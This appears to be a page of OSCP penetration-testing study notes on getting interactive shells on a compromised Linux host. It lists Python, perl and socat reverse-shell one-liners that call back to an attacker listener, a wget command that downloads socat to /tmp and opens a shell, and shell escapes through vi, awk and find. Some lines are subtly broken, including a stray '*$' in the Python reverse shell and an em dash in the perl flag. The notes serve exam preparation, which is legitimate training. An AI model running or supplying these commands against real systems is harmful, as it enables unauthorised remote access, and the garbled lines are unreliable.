OSCP Notes
Search…
Interactive TTYs Shell

Python pty module

1
python -c 'import pty; pty.spawn("/bin/sh")'
2
python3 -c 'import pty; pty.spawn("/bin/sh")'
3
python3 -c 'import pty; pty.spawn("/bin/bash")'
4
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Copied!

Perl

1
perl —e 'exec "/bin/sh";'
Copied!

Using socat

On Kali (listen):
1
socat file:`tty`,raw,echo=0 tcp-listen:4444
Copied!
On Victim (launch):
1
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Copied!
If not download in Victim:
1
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Copied!

Other ways

1
/bin/sh -i
2
echo os.system('/bin/bash')
3
exec "/bin/sh";
Copied!
Vi / Vim
1
:!bash
Copied!
1
:set shell=/bin/bash
2
:shell
Copied!
awk
1
awk 'BEGIN {system("/bin/bash")}'
Copied!
find
1
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
Copied!
Last modified 1yr ago